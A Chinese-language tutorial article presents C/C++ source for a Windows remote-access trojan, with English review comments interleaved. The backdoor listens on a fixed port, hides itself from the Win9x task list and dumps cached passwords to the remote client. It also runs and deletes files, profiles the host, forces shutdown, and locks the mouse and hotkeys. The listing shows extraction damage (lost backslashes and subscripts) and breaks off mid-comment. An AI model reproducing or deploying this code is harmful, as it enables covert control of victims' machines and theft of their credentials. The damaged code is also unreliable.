
一個簡單木馬例子

寫文章一般都附源代碼.除關鍵部分外向來不愛打太多說明性文字,因為覺得這樣

才比較實際,關于那些函數用法和功能大可以去翻書,哪裡講的比誰都詳細.

這裡給了一個用異步SOCKET方式, 直接調用WINSOCK API,WIN SDK寫的木馬(VC,C++ BUILDER下均編譯,調試通過),無須用戶端,編譯後才幾十K.實作了些 主要功能,檔案浏覽,上傳,下載(均支援通配符),改變目錄,擷取系統資訊,從CACHE取密碼, 執行檔案,顯示程序, 發送消息,關機, 還有些控制功能, WIN 9X,NT/2000下均 可使用,在NT,2000下,因考慮到如CMD.EXE已改名或不存在,那麼程式 将毫無用處. 是以 并沒有調用CMD.EXE來完成,全部由自己來做,WIN API實作.要想自己程式通用就不要怕 麻煩.建議那些用現成控件寫木馬和網絡通訊的朋友應該看看,去熟悉這些根本所在, 尤其是在網絡 通訊方面.如果你是個程式員 我想大可不必用我多說,在開發中還沒見過哪家公司讓 用現成類 (MFC,VCL)來做的.

此程式還不很健壯,寫完後也沒來的及優化,主要是拿來讓大家熟悉一下WINSOCK和WIN SDK程式設計.

//---------------------------------------------------------------------------

// WINSOCK API,WIN SDK程式設計,無需用戶端

//

// 作者: 賈佳

//---------------------------------------------------------------------------

#include <windows.h>

#include <winsock.h>

#include <mmsystem.h>

#pragma hdrstop

#include <condefs.h>

#pragma argsused

// Build-time constants and process-wide state shared by every handler below.
// Host/network artifacts visible at this level: the drop file name appended to the
// system directory (RUN), the fixed listening port (PORT) and the prompt string the
// remote client sees after every command (PROMPT).
// NOTE(review): the listing appears to have lost backslashes in extraction
// ("//WinMon32.exe", "/n/r" etc.); it is reproduced here as published, not repaired.
#define RUN "//WinMon32.exe"

// mode argument for RegisterServiceProcess in HideProc(): 1 = register
#define SERVICE_PROC 1

// 0 = unregister (used from WM_DESTROY)
#define UNSERVICE_PROC 0

// ToolHelp32 snapshot flag, declared locally instead of including tlhelp32.h
#define TH32CS_SNAPPROCESS 0x00000002

// not referenced anywhere in this listing
#define PROCESS_HANDLE_NAME 255

// length of the three heap buffers used by GetCachePW()/GetPass()
#define dwBuffSize 2048

// command-line length: size of the static receive/accumulate buffers in WndProc()
#define dwComm 50

// TCP port the implant listens on; bound to INADDR_ANY in InitSocket()
#define PORT 9102

// private window message that carries WSAAsyncSelect notifications
#define WM_SOCKET WM_USER+1

// prompt sent to the client after the banner and after each command
#define PROMPT "LanLan://>"

// Winsock version requested from WSAStartup (1.1)
DWORD dwVersion=MAKEWORD(1,1);

// value handed to setsockopt(SO_REUSEADDR)
DWORD dwFlag=TRUE;

WSADATA wsaData;

// CreateSock: listening socket. NewSock: the single accepted client that every
// command handler writes to (see WndProc FD_ACCEPT).
SOCKET CreateSock,NewSock;

SOCKADDR_IN Sock_in,NewSock_in;

// heap buffers shared between GetCachePW() and its GetPass() callback
LPTSTR szReadBuff,Ob,TempBuff;

int addrlen;

//CACHE PASSWORD結構

// Layout of one entry handed to the callback of WNetEnumCachedPasswords (MPR.DLL,
// resolved by name in GetCachePW() because it is not declared in the SDK headers).
// abResource is a one-element tail: GetPass() reads cbResource bytes of resource
// name from it, followed by cbPassword bytes of password, appending its own NUL
// to each part.
typedef struct tagPASSWORD_CACHE_ENTRY {

WORD cbEntry;

WORD cbResource;

WORD cbPassword;

BYTE iEntry;

BYTE nType;

char abResource[1];

} PASSWORD_CACHE_ENTRY;

// per-entry callback signature; GetPass() below has this shape
typedef BOOL (WINAPI *CACHECALLBACK)(PASSWORD_CACHE_ENTRY *pce,DWORD);

// prototype of WNetEnumCachedPasswords, obtained with GetProcAddress at run time
typedef WORD (WINAPI *PWNetEnumCachedPasswords)(

LPSTR pbPrefix,

DWORD cbPrefix,

DWORD nType,

CACHECALLBACK pfnCallback,

DWORD UNKNOWN

);

//TOOLHELP32 結構

// Local copy of the tlhelp32.h PROCESSENTRY32 layout (the header is not included)
typedef struct tagPROCESSENTRY32

{

DWORD dwSize;

DWORD cntUsage;

DWORD th32ProcessID;

DWORD th32DefaultHeapID;

DWORD th32ModuleID;

DWORD cntThreads;

DWORD th32ParentProcessID;

LONG pcPriClassBase;

DWORD dwFlags;

TCHAR szExeFile[MAX_PATH];

} PROCESSENTRY32;

typedef PROCESSENTRY32 * LPPROCESSENTRY32;

// ToolHelp32 and PSAPI entry points, filled in at run time by InitToolHelp32() and
// InitPSAPI(); presumably done this way so the image has no static import of either
// API and loads on both 9x and NT.
HANDLE (WINAPI *CreateToolhelp32Snapshot)(DWORD dwFlags,DWORD th32PD);

BOOL (WINAPI *Process32First)(HANDLE hSnapshot,LPPROCESSENTRY32 pe);

BOOL (WINAPI *Process32Next)(HANDLE hSnapshot,LPPROCESSENTRY32 pe);

BOOL (WINAPI *EnumProcesses)(DWORD* lpidProcess,DWORD cb,DWORD *cbNeeded);

DWORD (WINAPI *GetModuleFileNameExA)(HANDLE hProcess,HMODULE hModule,LPTSTR lpstrFileName,DWORD nSize);

// KERNEL32.DLL handle taken by HideProc(); never released with FreeLibrary
HINSTANCE DLLInst;

// Win9x-only KERNEL32 export, resolved by name in HideProc()
DWORD (WINAPI *RegisterServiceProcess)(DWORD, DWORD);

//---------------------------------------------------------------------------

// GetOS

// 判斷作業系統

//---------------------------------------------------------------------------

// Returns os.dwPlatformId for the two platforms the rest of the code distinguishes
// (Win9x vs NT); every OS-dependent routine switches on this value.
// NOTE(review): any other platform id falls off the end of the function without a
// return value (undefined behavior). sVersion is declared but never used.
DWORD WINAPI GetOS()

{

OSVERSIONINFO os;

TCHAR sVersion[MAX_PATH];

os.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);

GetVersionEx(&os);

switch(os.dwPlatformId)

{

case VER_PLATFORM_WIN32_WINDOWS:

return VER_PLATFORM_WIN32_WINDOWS;

case VER_PLATFORM_WIN32_NT:

return VER_PLATFORM_WIN32_NT;

}

}

//---------------------------------------------------------------------------

// HideProc

// 注冊程序

//---------------------------------------------------------------------------

// Registers (mode=SERVICE_PROC) or unregisters (mode=UNSERVICE_PROC) the current
// process through the Win9x-only KERNEL32 export RegisterServiceProcess. The export is
// looked up by name so the binary still loads on NT, where it is absent and this
// returns FALSE. On 9x a registered "service process" is kept out of the
// Ctrl+Alt+Del task list, which is the hiding effect the original comment refers to;
// WinMain() only calls this on VER_PLATFORM_WIN32_WINDOWS.
// Returns TRUE once the call has been made; the API's own return value is ignored.
// DLLInst is the file-scope handle and is never freed.
BOOL WINAPI HideProc(int mode)

{

DLLInst=LoadLibrary("KERNEL32.DLL");

if(DLLInst)

{

RegisterServiceProcess=(DWORD(WINAPI *)(DWORD,DWORD))

GetProcAddress(DLLInst,"RegisterServiceProcess");

if(RegisterServiceProcess)

{

RegisterServiceProcess(GetCurrentProcessId(),mode);

return TRUE;

}

else

return FALSE;

}

else return FALSE;

}

//---------------------------------------------------------------------------

// EnumProcess

// 枚舉程序

//---------------------------------------------------------------------------

//初始化TOOLHELP32

// Resolves the three ToolHelp32 entry points from KERNEL32.DLL into the file-scope
// function pointers. Used by EnumProcess() on the Win9x path only.
// Returns FALSE if the DLL cannot be loaded or any export is missing.
// The LoadLibrary reference taken here is never released.
BOOL InitToolHelp32()

{

HINSTANCE DLLinst=LoadLibrary("KERNEL32.DLL");

if(DLLinst)

{

CreateToolhelp32Snapshot=(HANDLE(WINAPI *)(DWORD dwFlags,DWORD th32PD))

GetProcAddress(DLLinst,"CreateToolhelp32Snapshot");

Process32First=(BOOL(WINAPI *)(HANDLE hSnapshot,LPPROCESSENTRY32 pe))

GetProcAddress(DLLinst,"Process32First");

Process32Next=(BOOL(WINAPI *)(HANDLE hSnapshot,LPPROCESSENTRY32 pe))

GetProcAddress(DLLinst,"Process32Next");

// pointers are compared via a UINT cast rather than against NULL
if((!(UINT)CreateToolhelp32Snapshot)||(!(UINT)Process32First)||(!(UINT)Process32Next))

return FALSE;

else

return TRUE;

}

return FALSE;

}

//初始化PSAPI

// Resolves EnumProcesses and GetModuleFileNameExA from PSAPI.DLL into the file-scope
// function pointers. Used by EnumProcess() on the NT path only.
// Returns FALSE if PSAPI.DLL cannot be loaded.
// NOTE(review): the export check below tests GetModuleFileName, the statically linked
// KERNEL32 import, rather than the GetModuleFileNameExA pointer assigned just above,
// so only EnumProcesses is actually validated here.
BOOL InitPSAPI()

{

HINSTANCE PSAPI=LoadLibrary("PSAPI.DLL");

if(NULL==PSAPI)

return FALSE;

EnumProcesses=(BOOL(WINAPI *)(DWORD* lpidProcess,DWORD cb,DWORD *cbNeeded))

GetProcAddress(PSAPI,"EnumProcesses");

GetModuleFileNameExA=(DWORD(WINAPI *)(HANDLE hProcess,HMODULE hModule,LPTSTR lpstrFileName,DWORD nSize))

GetProcAddress(PSAPI,"GetModuleFileNameExA");

if(NULL == EnumProcesses||NULL == GetModuleFileName)

return FALSE;

else

return TRUE;

}

// "dproc" command: sends the image name of every running process to the client,
// using ToolHelp32 on Win9x and PSAPI on NT (selected via GetOS()).
// Behavior worth knowing when reading a capture or the host state afterwards:
//  - on 9x every enumerated process is additionally opened with PROCESS_TERMINATE and
//    the handle stored in process[]; only the snapshot handle is ever closed;
//  - on NT the `if` around wsprintf has no braces, so when GetModuleFileNameExA fails
//    the previous szTemp contents are sent again; only the last process handle is
//    closed; at most 255 PIDs are collected.
// NOTE(review): `process=OpenProcess(...)` and the `process_ids` argument read as
// whole-array expressions in this listing; the `[i]` subscripts were presumably lost
// in extraction. Left as published.
VOID WINAPI EnumProcess()

{

HANDLE process[255];

PROCESSENTRY32 p32;

DWORD process_ids[255];

DWORD num_processes;

TCHAR file_name[MAX_PATH];

TCHAR szTemp[MAX_PATH];

unsigned i;

wsprintf(szTemp,"/n/n/r << Process File Name >>/n/n/r");

send(NewSock,szTemp,lstrlen(szTemp),0);

switch(GetOS())

{

case VER_PLATFORM_WIN32_WINDOWS:

if(InitToolHelp32())

{

p32.dwSize=sizeof(PROCESSENTRY32);

HANDLE pName=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);

BOOL Next=Process32First(pName,&p32);

i=0;

while(Next)

{

wsprintf(szTemp,"Process FileName :%s /n/r",p32.szExeFile);

send(NewSock,szTemp,lstrlen(szTemp),0);

process=OpenProcess(PROCESS_TERMINATE,0,p32.th32ProcessID);

Next=Process32Next(pName,&p32);

i++;

}

CloseHandle(pName);

}

break;

case VER_PLATFORM_WIN32_NT:

if(InitPSAPI())

{

// num_processes receives a byte count here, not an entry count; the loop below uses it as a count
EnumProcesses(process_ids,sizeof(process_ids),&num_processes);

for(i=0; i<num_processes; i++)

{

process=OpenProcess(PROCESS_QUERY_INFORMATION|PROCESS_VM_READ

,0,process_ids);

if(GetModuleFileNameExA(process,NULL,file_name,sizeof(file_name)))

wsprintf(szTemp,"Process FileName :%s /n/r",file_name);

send(NewSock,szTemp,lstrlen(szTemp),0);

}

CloseHandle(process);

}

break;

}

}

//---------------------------------------------------------------------------

// GetCachePW

// 取CACHE密碼

//---------------------------------------------------------------------------

// CACHECALLBACK invoked once per cached credential by WNetEnumCachedPasswords (see
// GetCachePW()). Copies the resource name and then the password out of the entry
// into the shared heap buffers, converts each to the OEM code page, formats
// "(USERNAME): ... (PASSWORD): ..." in TempBuff and sends it to the client.
// Returns TRUE so enumeration continues. The unnamed second parameter is unused.
// send() is given dwBuffSize (2048) rather than the string length, so the whole of
// TempBuff, including bytes left behind by longer earlier entries, goes on the wire.
BOOL CALLBACK GetPass(PASSWORD_CACHE_ENTRY *pce,DWORD)

{

MoveMemory(szReadBuff,pce->abResource,pce->cbResource);

szReadBuff[pce->cbResource]=0;

CharToOem(szReadBuff,Ob);

wsprintf(TempBuff,"/n/n/r (USERNAME): %s /n/r (PASSWORD): ",Ob);

// the password bytes follow the resource name directly inside abResource
MoveMemory(szReadBuff,pce->abResource+pce->cbResource,pce->cbPassword);

szReadBuff[pce->cbPassword]=0;

CharToOem(szReadBuff,Ob);

lstrcat(TempBuff,Ob);

send(NewSock,TempBuff,dwBuffSize,0);

return TRUE;

}

// "getpw" command: dumps the Windows 9x password cache to the client by calling the
// MPR.DLL export WNetEnumCachedPasswords (looked up by name; not in the SDK headers)
// with GetPass() as the per-entry callback. The "<< Win 9x Cache Password >>" header
// is sent before the export is even resolved.
// Returns FALSE if MPR.DLL or the export is unavailable (the second early return
// leaks the LoadLibrary reference), otherwise TRUE.
// The three dwBuffSize buffers are file-scope so the callback can reach them.
// NOTE(review): HeapFree's second parameter is a flags word; dwBuffSize (2048) is
// passed there, which is not a documented HeapFree flag.
BOOL WINAPI GetCachePW()

{

TCHAR szTemp[MAX_PATH];

PWNetEnumCachedPasswords WNetEnumCachedPasswords;

HINSTANCE DLLinst=LoadLibrary("MPR.DLL");

if(!DLLinst)

{

return FALSE;

}

wsprintf(szTemp,"/n/n/r << Win 9x Cache Password >>/n/r");

send(NewSock,szTemp,lstrlen(szTemp),0);

WNetEnumCachedPasswords=(PWNetEnumCachedPasswords)

GetProcAddress(DLLinst,"WNetEnumCachedPasswords");

if(!WNetEnumCachedPasswords)

{

return FALSE;

}

else

{

szReadBuff=(LPTSTR)HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,dwBuffSize);

Ob=(LPTSTR)HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,dwBuffSize);

TempBuff=(LPTSTR)HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,dwBuffSize);

// no prefix filter, nType 0xff: every cached entry reaches GetPass()
WNetEnumCachedPasswords(0,0,0xff,GetPass,0);

HeapFree(GetProcessHeap(),dwBuffSize,szReadBuff);

HeapFree(GetProcessHeap(),dwBuffSize,Ob);

HeapFree(GetProcessHeap(),dwBuffSize,TempBuff);

FreeLibrary(DLLinst);

}

return TRUE;

}

//---------------------------------------------------------------------------

// LoadProcess

// 執行檔案

//---------------------------------------------------------------------------

// "execfile" command: starts szFileName as a new process with no command-line
// arguments, default creation flags and a normal (visible) main window.
// Returns FALSE when CreateProcess fails, TRUE otherwise.
// The process and thread handles returned in pi are never closed.
BOOL WINAPI LoadProcess(LPCTSTR szFileName)

{

STARTUPINFO si;

PROCESS_INFORMATION pi;

ZeroMemory(&si,sizeof(STARTUPINFO));

ZeroMemory(&pi,sizeof(PROCESS_INFORMATION));

si.cb=sizeof(STARTUPINFO);

si.dwFlags=STARTF_USESHOWWINDOW;

si.wShowWindow=SW_SHOWNORMAL;

if(CreateProcess(szFileName,NULL,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi)==FALSE)

{

return FALSE;

}

return TRUE;

}

//---------------------------------------------------------------------------

// Dir

// 浏覽檔案,支援通配符

//---------------------------------------------------------------------------

// "dir" command: enumerates entries matching the lParam pattern (FindFirstFile
// accepts wildcards, relative to the current directory set by ChangeDir()) and sends
// one formatted line per entry to the client.
// Behavior visible in the code:
//  - the switch compares dwFileAttributes for exact equality, so an entry whose
//    attribute word combines several bits matches no case and is silently omitted;
//  - every non-directory case prints the same "ARCHIVE" tag;
//  - for files over 4 GiB the two size halves are added, not combined as 64-bit;
//  - the search handle is never passed to FindClose;
//  - lParam is copied into a MAX_PATH local with lstrcpy, without a length check.
VOID WINAPI Dir(LPCTSTR lParam)

{

WIN32_FIND_DATA wfd;

HANDLE hHandle;

TCHAR szFileName[MAX_PATH];

int i;

wsprintf(szFileName,"/n/n/r");

send(NewSock,szFileName,lstrlen(szFileName),0);

lstrcpy(szFileName,lParam);

if((hHandle=FindFirstFile(szFileName,&wfd))!=INVALID_HANDLE_VALUE)

{

do

{

switch(wfd.dwFileAttributes)

{

case FILE_ATTRIBUTE_ARCHIVE:

if(wfd.nFileSizeHigh==0)

wsprintf(szFileName,"%-20s %10lu ARCHIVE/n/r",wfd.cFileName,wfd.nFileSizeLow);

else

wsprintf(szFileName,"%-20s %10lu ARCHIVE/n/r",wfd.cFileName,wfd.nFileSizeHigh+wfd.nFileSizeLow);

send(NewSock,szFileName,lstrlen(szFileName),0);

break;

case FILE_ATTRIBUTE_DIRECTORY:

wsprintf(szFileName,"%-20s %10lu <DIR>/n/r",wfd.cFileName,wfd.nFileSizeLow);

send(NewSock,szFileName,lstrlen(szFileName),0);

break;

case FILE_ATTRIBUTE_HIDDEN:

if(wfd.nFileSizeHigh==0)

wsprintf(szFileName,"%-20s %10lu ARCHIVE/n/r",wfd.cFileName,wfd.nFileSizeLow);

else

wsprintf(szFileName,"%-20s %10lu ARCHIVE/n/r",wfd.cFileName,wfd.nFileSizeHigh+wfd.nFileSizeLow);

send(NewSock,szFileName,lstrlen(szFileName),0);

break;

case FILE_ATTRIBUTE_READONLY:

if(wfd.nFileSizeHigh==0)

wsprintf(szFileName,"%-20s %10lu ARCHIVE/n/r",wfd.cFileName,wfd.nFileSizeLow);

else

wsprintf(szFileName,"%-20s %10lu ARCHIVE/n/r",wfd.cFileName,wfd.nFileSizeHigh+wfd.nFileSizeLow);

send(NewSock,szFileName,lstrlen(szFileName),0);

break;

case FILE_ATTRIBUTE_SYSTEM:

if(wfd.nFileSizeHigh==0)

wsprintf(szFileName,"%-20s %10lu ARCHIVE/n/r",wfd.cFileName,wfd.nFileSizeLow);

else

wsprintf(szFileName,"%-20s %10lu ARCHIVE/n/r",wfd.cFileName,wfd.nFileSizeHigh+wfd.nFileSizeLow);

send(NewSock,szFileName,lstrlen(szFileName),0);

break;

}

}while(FindNextFile(hHandle,&wfd));

}

else

{

wsprintf(szFileName,"Can not find directory or files./n/r");

send(NewSock,szFileName,lstrlen(szFileName),0);

}

}

//---------------------------------------------------------------------------

// FileOpertion

// 檔案操作函數

//---------------------------------------------------------------------------

// Shell file operation used by Delete(), Copy() and Ren() (name sic). opt is the
// SHFILEOPSTRUCT wFunc value (FO_DELETE / FO_COPY / FO_RENAME).
// SHFileOperation takes pFrom/pTo as double-NUL-terminated lists, which is why a
// second terminator is written at lstrlen()+1 after each lstrcpy.
// The flags suppress all UI (FOF_SILENT, FOF_NOCONFIRMATION, FOF_NOCONFIRMMKDIR) and
// limit wildcard matches to files (FOF_FILESONLY). FOF_ALLOWUNDO lets an FO_DELETE
// go through the Recycle Bin instead of unlinking directly, which matters when
// looking for deleted files afterwards.
// Returns TRUE when SHFileOperation reports 0, FALSE otherwise.
// Both paths are copied into MAX_PATH locals with lstrcpy, without a length check.
BOOL WINAPI FileOpertion(LPCTSTR szFileName1,LPCTSTR szFileName2,DWORD opt)

{

SHFILEOPSTRUCT shf;

TCHAR sr[MAX_PATH];

TCHAR de[MAX_PATH];

lstrcpy(sr,szFileName1);

sr[lstrlen(sr)+1]=‘/0‘;

lstrcpy(de,szFileName2);

de[lstrlen(de)+1]=‘/0‘;

ZeroMemory(&shf,sizeof(shf));

shf.hwnd=NULL;

shf.wFunc=opt;

shf.pFrom=sr;

shf.pTo=de;

shf.fFlags=FOF_ALLOWUNDO|FOF_SILENT|FOF_FILESONLY|FOF_MULTIDESTFILES

|FOF_NOCONFIRMATION|FOF_NOCONFIRMMKDIR;

if(SHFileOperation(&shf))

return FALSE;

else

return TRUE;

}

//---------------------------------------------------------------------------

// Delete

// 删除檔案(隐藏,隻讀),目錄,支援通配符

//---------------------------------------------------------------------------

// "del" command: deletes lParam (wildcards allowed) through FileOpertion(FO_DELETE)
// and reports the outcome to the client. The status strings are sent with
// hard-coded lengths; 20 for the 19-character failure text includes the NUL.
VOID WINAPI Delete(LPCTSTR lParam)

{

if(!FileOpertion(lParam,"",FO_DELETE))

send(NewSock,"Delete File is Fail",20,0);

else

send(NewSock,"Delete File is OK",17,0);

}

//---------------------------------------------------------------------------

// Copy

// 複制,上傳,下載檔案(需先将自己硬碟設定為完全共享),支援通配符

//---------------------------------------------------------------------------

// "copy" command: copies lParam1 to lParam2 through FileOpertion(FO_COPY) and
// reports the outcome. Per the original header comment this doubles as the
// upload/download path when the destination is a network share. The failure string
// is sent with length 18, one more than its 17 characters.
VOID WINAPI Copy(LPCTSTR lParam1,LPCTSTR lParam2)

{

if(!FileOpertion(lParam1,lParam2,FO_COPY))

send(NewSock,"Copy File is Fail",18,0);

else

send(NewSock,"Copy File is OK",15,0);

}

//---------------------------------------------------------------------------

// Ren

// 檔案,目錄重命名

//---------------------------------------------------------------------------

// "ren" command: renames lParam1 to lParam2 through FileOpertion(FO_RENAME) and
// reports the outcome. The misspelled status strings ("Renname", "Reanme") are what
// actually appears on the wire, each sent with one byte more than its length.
VOID WINAPI Ren(LPCTSTR lParam1,LPCTSTR lParam2)

{

if(!FileOpertion(lParam1,lParam2,FO_RENAME))

send(NewSock,"Renname File is Fail",21,0);

else

send(NewSock,"Reanme File is OK",18,0);

}

//---------------------------------------------------------------------------

// GetSysInfo

// 擷取系統資訊

//---------------------------------------------------------------------------

// "getinfo" command: sends a host profile to the client, one section at a time:
// computer name, platform (9x vs NT/2000), physical memory, Windows/system
// directories, and for each drive letter the drive type plus file system name.
// Notes on the code as written:
//  - the OS switch has no default, so on an unrecognised platform szTemp still holds
//    the computer name when it is printed as "Option System";
//  - GetVolumeInformation is told szFileSys is MAX_PATH bytes long although the
//    local is 10 bytes;
//  - the directory line is formatted from two MAX_PATH strings into a MAX_PATH buffer.
VOID WINAPI GetSysInfo()

{

TCHAR szBuff[MAX_PATH];

TCHAR szTemp[MAX_PATH];

wsprintf(szBuff,"/n/n/r<<System Information>>/n/n/r");

send(NewSock,szBuff,lstrlen(szBuff),0);

// computer name
DWORD len=sizeof(szTemp);

GetComputerName(szTemp,&len);

wsprintf(szBuff,"Computer Name: %s/n/n/r",szTemp);

send(NewSock,szBuff,lstrlen(szBuff),0);

// current operating system
switch(GetOS())

{

case VER_PLATFORM_WIN32_WINDOWS:

lstrcpy(szTemp,"Windows 9x");

break;

case VER_PLATFORM_WIN32_NT:

lstrcpy(szTemp,"Windows NT/2000");

break;

}

wsprintf(szBuff,"Option System: %s/n/n/r",szTemp);

send(NewSock,szBuff,lstrlen(szBuff),0);

// physical memory, rounded up to the next MiB
MEMORYSTATUS mem;

mem.dwLength=sizeof(mem);

GlobalMemoryStatus(&mem);

wsprintf(szBuff,"Total Memroy: %dM/n/n/r",mem.dwTotalPhys/1024/1024+1);

send(NewSock,szBuff,lstrlen(szBuff),0);

// Windows and system directories
TCHAR szPath[MAX_PATH];

GetWindowsDirectory(szTemp,sizeof(szTemp));

GetSystemDirectory(szBuff,sizeof(szBuff));

wsprintf(szPath,"Windows Directory: %s/n/n/rSystem Directory: %s/n/n/r",szTemp,szBuff);

send(NewSock,szPath,lstrlen(szPath),0);

// drive letters A..Z: type and file system
TCHAR szFileSys[10];

for(int i=0;i<26;++i)

{

wsprintf(szTemp,"%c://",‘A‘+i);

UINT uType=GetDriveType(szTemp);

switch(uType)

{

case DRIVE_FIXED:

GetVolumeInformation(szTemp,NULL,NULL,NULL,NULL,NULL,szFileSys,MAX_PATH);

wsprintf(szBuff,"Hard Disk: %s (%s)/n/n/r",szTemp,szFileSys);

send(NewSock,szBuff,lstrlen(szBuff),0);

break;

case DRIVE_CDROM:

wsprintf(szBuff,"CD-ROM Disk: %s/n/n/r",szTemp);

send(NewSock,szBuff,lstrlen(szBuff),0);

break;

case DRIVE_REMOTE:

GetVolumeInformation(szTemp,NULL,NULL,NULL,NULL,NULL,szFileSys,MAX_PATH);

wsprintf(szBuff,"NetWork Disk: %s (%s)/n/n/r",szTemp,szFileSys);

send(NewSock,szBuff,lstrlen(szBuff),0);

break;

}

}

}

//---------------------------------------------------------------------------

// ExitWin

// 關閉計算機(WIN 9X,NT/2000)

//---------------------------------------------------------------------------

// "exitwin" command: shuts the machine down. On Win9x it calls ExitWindowsEx with
// flag 1 (EWX_SHUTDOWN). On NT it first enables SE_SHUTDOWN_NAME on its own token,
// then forces a power-off (EWX_FORCE|EWX_POWEROFF) if AdjustTokenPrivileges succeeds.
// The process and token handles are never closed, and the results of
// OpenProcessToken / LookupPrivilegeValue are not checked before use.
VOID WINAPI ExitWin()

{

DWORD dwVer;

HANDLE hProcess, hToken;

TOKEN_PRIVILEGES NewState;

DWORD ProcessId, ReturnLength = 0;

LUID luidPrivilegeLUID;

dwVer=GetOS();

if(dwVer==VER_PLATFORM_WIN32_WINDOWS)

ExitWindowsEx(1,0);

else if(dwVer==VER_PLATFORM_WIN32_NT)

{

ProcessId = GetCurrentProcessId();

hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);

OpenProcessToken(hProcess,TOKEN_ADJUST_PRIVILEGES, &hToken);

LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &luidPrivilegeLUID);

NewState.PrivilegeCount = 1;

NewState.Privileges[0].Luid = luidPrivilegeLUID;

NewState.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

if(AdjustTokenPrivileges(hToken, FALSE, &NewState, NULL, NULL, NULL))

ExitWindowsEx(EWX_FORCE|EWX_POWEROFF,0);

}

}

//---------------------------------------------------------------------------

// CtrlCD

// 光驅控制

//---------------------------------------------------------------------------

// "opencd" (Ctrl=TRUE) / "closecd" (Ctrl=FALSE): opens or closes the CD tray with an
// MCI command string. hWnd is passed as the MCI notification window; the "wait"
// keyword makes mciSendString block until the drive finishes.
VOID WINAPI CtrlCD(HWND hWnd,BOOL Ctrl)

{

switch(Ctrl)

{

case TRUE:

mciSendString("Set cdaudio door open wait",NULL,0,hWnd);

break;

case FALSE:

mciSendString("Set cdaudio door closed wait",NULL,0,hWnd);

break;

}

}

//---------------------------------------------------------------------------

// PopMsg

// 發送消息

//---------------------------------------------------------------------------

// "popmsg" command: shows `message` in a message box titled "PopMsg" owned by the
// implant's hidden window. Called from inside WndProc's FD_READ handler, so the
// handler does not return until the box is dismissed.
VOID WINAPI PopMsg(LPCTSTR message,HWND hWnd)

{

MessageBox(hWnd,message,"PopMsg",MB_OK);

}

//---------------------------------------------------------------------------

// ChangeDir

// 改變目前目錄

//---------------------------------------------------------------------------

// "cd" command: changes the process's current directory, which the relative patterns
// given to Dir()/Delete()/Copy()/Ren() are then resolved against.
// Returns TRUE on success, FALSE if SetCurrentDirectory fails.
BOOL WINAPI ChangeDir(LPCTSTR szDir)

{

if(SetCurrentDirectory(szDir))

return TRUE;

else

return FALSE;

}

//---------------------------------------------------------------------------

// GetCurPath

// 得到目前目錄

//---------------------------------------------------------------------------

// "gcpath" command: sends the process's current directory to the client as
// "CurrentDirect: <path>".
VOID WINAPI GetCurPath()

{

TCHAR lpBuff[MAX_PATH];

TCHAR szTemp[MAX_PATH];

GetCurrentDirectory(MAX_PATH,lpBuff);

wsprintf(szTemp,"CurrentDirect: %s/n/r",lpBuff);

send(NewSock,szTemp,lstrlen(szTemp),0);

}

//---------------------------------------------------------------------------

// HSSys

// 顯示,隐藏桌面,工作列

//---------------------------------------------------------------------------

// "hidesys" (Ctrl=FALSE) / "showsys" (Ctrl=TRUE): hides or shows the desktop window
// (class "Progman") and the taskbar, each located by window class with FindWindow.
// The hWnd parameter is overwritten immediately, so the caller's handle is unused.
// NOTE(review): the taskbar class literal is printed as "Sh*ll _TrayWnd" on this
// page, which looks mangled; it is left exactly as published.
VOID WINAPI HSSys(HWND hWnd,BOOL Ctrl)

{

switch(Ctrl)

{

case FALSE:

hWnd=FindWindow("Progman",NULL);

ShowWindow(hWnd,SW_HIDE);

hWnd=FindWindow("Sh*ll _TrayWnd",NULL);

ShowWindow(hWnd,SW_HIDE);

break;

case TRUE:

hWnd=FindWindow("Progman",NULL);

ShowWindow(hWnd,SW_SHOW);

hWnd=FindWindow("Sh*ll _TrayWnd",NULL);

ShowWindow(hWnd,SW_SHOW);

break;

}

}

//---------------------------------------------------------------------------

// LockMK

// 鎖定滑鼠,功能鍵

//---------------------------------------------------------------------------

// "lockmk" (Ctrl=TRUE) / "unlock" (Ctrl=FALSE): as the original header says, locks
// the mouse and the system hotkeys. The mouse is pinned by clipping the cursor to an
// all-zero RECT; ClipCursor(NULL) releases it. SPI_SCREENSAVERRUNNING=TRUE is the
// Win9x-era way of telling the system a screen saver is active, which on 9x also
// suppresses Ctrl+Alt+Del and Alt+Tab; NT-based systems do not honour it that way
// (TODO confirm on the target platform). SPI_SETFASTTASKSWITCH toggles the
// fast-task-switch hotkey handling.
VOID WINAPI LockMK(BOOL Ctrl)

{

RECT rc;

switch(Ctrl)

{

case TRUE:

ZeroMemory(&rc,sizeof(rc));

ClipCursor(&rc);

SystemParametersInfo(SPI_SCREENSAVERRUNNING,TRUE,NULL,0);

SystemParametersInfo(SPI_SETFASTTASKSWITCH,TRUE,NULL,0);

break;

case FALSE:

ClipCursor(NULL);

SystemParametersInfo(SPI_SCREENSAVERRUNNING,FALSE,NULL,0);

SystemParametersInfo(SPI_SETFASTTASKSWITCH,FALSE,NULL,0);

break;

}

}

//---------------------------------------------------------------------------

// ExeCommand

// 執行指令

//---------------------------------------------------------------------------

// Command dispatcher, called from WndProc once a full line has been received.
// Exact-match verbs (lstrcmp): getpw, getinfo, gcpath, opencd, closecd, showsys,
// hidesys, lockmk, unlock, dproc, exitwin. Prefix-match verbs (strncmp on the verb
// length, so any line beginning with the verb qualifies): popmsg, execfile, cd, dir,
// del, copy, ren. Anything else gets "Bad Command !!!".
// Argument parsing for the prefix verbs: the loop scans for a second space after the
// verb; if none is found, everything after the verb is Param1. copy/ren additionally
// split at that space into Param1/Param2. Params are MAX 100 bytes, filled by lstrcpy.
// Notes on the code as written:
//  - the usage branches for popmsg/execfile/cd/dir/del do not return, so parsing
//    continues on the short line; only copy/ren return early;
//  - several send() calls pass a length larger than the literal (e.g. 28 for the
//    22-byte "usage : popmsg Message"), so bytes beyond the literal go on the wire;
//  - "cd" is tested before "dir"/"del"/"copy"/"ren", and as a prefix test it also
//    captures any other line starting with "cd".
// NOTE(review): `szCommand==‘ ‘` and `szBuf=0` read as whole-pointer comparisons and
// assignments in this listing; the `[i]` subscripts were presumably lost in
